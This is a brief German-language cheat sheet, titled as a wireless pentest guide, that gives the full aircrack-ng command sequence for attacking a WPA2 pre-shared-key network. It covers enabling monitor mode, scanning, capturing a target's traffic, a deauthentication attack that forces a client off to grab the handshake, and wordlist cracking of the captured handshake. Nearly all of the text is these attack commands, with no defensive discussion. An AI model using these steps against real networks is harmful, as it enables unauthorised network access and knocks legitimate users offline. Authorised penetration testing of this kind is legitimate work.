Wireless Pentest

Für die Verschlüsselung des Drahtlosen Heimnetzwerkes kommen üblicherweise zwei Verfahren zum Einsatz. Für Private Anwendungsfälle WPA2 Pre Shared Key. Für Geschäftliche Anwendungsfälle wird WPA2 Enterprise verwendet.

1. Karte in Monitor Mode setzen

   airmon-ng check kill # Beendet Prozesse, die die Karte nutzen
   airmon-ng start <INTERFACE>
   

2. WLAN Netzwerke Scannen

   airodump-ng <MONITORRING INTERFACE>
   

3. Monitor Target

   airodump-ng -c <CHANNEL> --bssid <MAC OF TARGET> -w capture <MONITORRING INTERFACE>
   

4. Während des Monitoren eine Deauth Attacke starten um einen Client zur Neuanmeldung zu zwingen und so den Handshake abzufangen

   aireplay-ng -0 1 -a <BSSID> -c <STATION> <INTERFACE>
   

5. Knacken des Handshakes

   aircrack-ng -w <WORDLIST> -b <BSSID> capture.cap